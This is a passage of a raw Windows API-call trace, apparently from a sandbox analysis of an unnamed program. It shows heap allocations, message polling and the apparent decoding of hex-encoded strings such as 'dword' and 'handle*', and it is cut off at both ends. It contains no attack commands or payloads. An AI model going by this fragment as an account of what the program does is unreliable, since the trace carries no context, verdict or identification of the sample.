hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72be8 [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a796f0 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1050 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d58 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a796a0 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f11e8 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72bb8 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f11e8 | out: hHeap=0x2af0000) returned 1 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a795b0 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f11e8 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1308 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a796f0 | out: hHeap=0x2af0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72be8 | out: hHeap=0x2af0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.259] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79628 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d68 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1248 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d28 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d28 | out: hHeap=0x2af0000) returned 1 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d08 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1368 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1380 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d88 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d88 | out: hHeap=0x2af0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1380 | out: hHeap=0x2af0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1368 | out: hHeap=0x2af0000) returned 1 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d08 | out: hHeap=0x2af0000) returned 1 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bd8 [0085.259] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bd8 | out: hHeap=0x2af0000) returned 1 [0085.259] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0085.260] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d18 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1368 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1380 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d28 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1398 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d38 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15a8 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bd8 [0085.260] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1770 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bd8 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ba8 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ca8 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1770 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15c0 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f17a0 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15a8 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d38 | out: hHeap=0x2af0000) returned 1 [0085.260] lstrlenW (lpString="64") returned 2 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72be8 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f2850 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d28 | out: hHeap=0x2af0000) returned 1 [0085.260] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1380 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1368 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d18 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d88 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1398 | out: hHeap=0x2af0000) returned 1 [0085.261] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.261] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c88 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ba8 | out: hHeap=0x2af0000) returned 1 [0085.261] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72cd8 | out: hHeap=0x2af0000) returned 1 [0085.262] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0085.262] lstrlenW (lpString="77") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] lstrlenW (lpString="6F") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] lstrlenW (lpString="72") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] lstrlenW (lpString="64") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] lstrlenW (lpString="20") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] lstrlenW (lpString="30") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.262] lstrlenW (lpString="20") returned 2 [0085.262] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="68") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="61") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="6E") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="64") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="6C") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="65") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] lstrlenW (lpString="2A") returned 2 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.263] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] lstrlenW (lpString="20") returned 2 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] lstrlenW (lpString="30") returned 2 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] lstrlenW (lpString="20") returned 2 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] lstrlenW (lpString="20") returned 2 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] lstrlenW (lpString="30") returned 2 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] lstrlenW (lpString="20") returned 2 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.264] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.264] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] lstrlenW (lpString="20") returned 2 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] lstrlenW (lpString="31") returned 2 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] lstrlenW (lpString="20") returned 2 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] lstrlenW (lpString="20") returned 2 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] lstrlenW (lpString="31") returned 2 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] lstrlenW (lpString="20") returned 2 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.265] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.266] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.266] lstrlenW (lpString="20") returned 2 [0085.266] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.266] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.266] lstrlenW (lpString="35") returned 2 [0085.266] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.266] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] lstrlenW (lpString="20") returned 2 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] lstrlenW (lpString="62") returned 2 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] lstrlenW (lpString="79") returned 2 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.308] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 